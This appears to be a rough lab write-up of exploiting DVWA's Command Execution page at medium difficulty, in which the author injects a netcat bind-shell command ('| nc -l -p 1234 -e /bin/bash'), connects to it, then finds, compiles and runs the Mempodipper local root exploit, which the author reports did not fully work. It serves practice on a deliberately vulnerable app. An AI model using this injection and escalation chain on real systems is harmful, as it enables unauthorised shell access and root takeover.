DVWA - Command Execution : MEDIUN LEVEL

TO GET THE ROOT

we start with first open DVWA
before that you first start apache and mysql, after which it will appear as below.
You can fill in the username "admin" and password "password".

Here we will be setting first DVWA with MEDIUM Level

then click Command Execution and here you can fill | nc-l-p 1234-e / bin / bash
we run nc for listening.

after that we open the console and type nc 127.0.0.1 1234  
after you type ls will appear as below

then we will start making the payload to be able to access the root Backtrack.
because the backtrack kernel version 2.6.39
then we go first to the exploitdb to be updated.
after the update we search with keywords ./searchsploit 2.6.39
or you can follow the instructions below. 

root@bt:/pentest/exploits/exploitdb# ./searchsploit 2.6.39

Description Path

---------------------------------------------------------------------------

Mempodipper - Linux Local Root for >=2.6.39 /linux/local/18411.c

root@bt:/pentest/exploits/exploitdb# cd platforms/linux/local/

root@bt:/pentest/exploits/exploitdb/platforms/linux/local# ls

10018.sh 1229.sh 1449.c 15774.c 18072.sh 2016.sh 2466.pl 331.c 374.c 5092.c 72.c 824.c 924.c 9608.c

10022.c 1267.c 144.c 1579.pl 18080.c 2031.c 2492.s 3330.pl 375.c 5093.c 7313.sh 8303.c 926.c 9627.txt

10038.txt 1297.py 145.c 15916.c 18086.c 203.sh 249.c 3333.pl 393.c 5167.sh 7393.txt 8369.sh 9302.py 9641.txt

10060.sh 1299.sh 14814.c 1591.py 180.c 205.pl 252.pl 3356.sh 394.c 5424.txt 741.pl 8470.py 9352.c 9709.txt

1009.c 129.asm 14830.py 15944.c 18105.sh 206.c 255.pl 3384.c 3.c 586.c 744.c 8478.sh 9363.c 973.c

1029.c 12.c 15023.c 1596.txt 18147.c 209.c 257.pl 339.c 4028.txt 587.c 756.c 8534.c 93.c 974.pl

10313.c 1300.sh 15024.c 15974.txt 18228.sh 2144.sh 2581.c 3426.php 40.pl 591.c 75.c 8572.c 9435.txt 9844.py

10396.pl 1310.txt 15074.sh 16086.txt 182.sh 215.c 258.sh 3427.php 411.c 600.c 7618.c 8673.c 9436.txt 997.sh

10487.txt 1316.pl 15150.c 160.c 1831.txt 216.c 260.c 3440.php 4172.c 601.c 763.c 8678.c 9477.txt

104.c 131.c 15155.c 17083.pl 183.c 217.c 273.c 3479.php 417.c 6032.py 7681.txt 876.c 9479.c

10613.c 1397.c 1518.c 17147.txt 18411.c 218.c 285.c 3480.php 434.sh 624.c 776.c 877.pl 950.c

10617.txt 140.c 15274. 17391.c 184.pl 2193.php 290.sh 3499.php 438.c 6337.sh 778.c 890.pl 9513.c

106.c 1412.rb 15274.txt 17611.pl 186.pl 219.c 3154.c 3525.php 4460.c 657.c 779.sh 895.c 9521.c

1154.pl 1415.c 15285.c 17787.c 193.sh 21.c 317.txt 3529.php 466.pl 669.c 7855.txt 9083.c 9542.c

1170.c 141.c 152.c 178.c 2004.c 221.c 319.c 3571.php 4698.c 684.c 7856.txt 9135.sh 9543.c

1181.c 1425.c 15304.txt 17932.c 2005.c 222.c 31.pl 3572.php 469.c 6851.c 788.pl 913.pl 9545.c

1187.c 14273.sh 154.c 17942.c 2006.c 229.c 320.pl 3587.c 470.c 695.c 791.c 914.c 9574.txt

120.c 142.c 15620.sh 18040.c 2011.sh 231.sh 3213.c 3595.c 4756.c 7177.c 792.c 9191.txt 9575.c

12130.py 14339.sh 15704.c 18064.sh 2013.c 2338.c 322.c 369.pl 476.c 718.c 796.sh 91.c 9595.c

1215.c 1445.c 15745.txt 18071.sh 2015.py 2404.c 325.c 3730.txt 479.c 71.c 816.c 9208.txt 9598.txt

root@bt:/pentest/exploits/exploitdb/platforms/linux/local# kwrite 18411.c 
to compile the file 18411.c is you can type as below

root@bt:/var# gcc -w exploit.c -o exploit 

once in place you can compile the compile the file to / var / tmp

to make sure they are in /var/tmp you can follow the instructions below

root@bt:/var# cd

root@bt:~# cd /tmp/

root@bt:/tmp# ls

exploit kde-root ksocket-root plugtmp serverauth.1iXwNGUfwV VMwareDnD

when we've run nc before we go first to the / var / tmp
with the command  cd/var/tmp
and you can simply type ./exploit to run the payload.
and the result will be like this ....

above this we can see has not been fully successful.
because I am also still confused, why not get into the root ......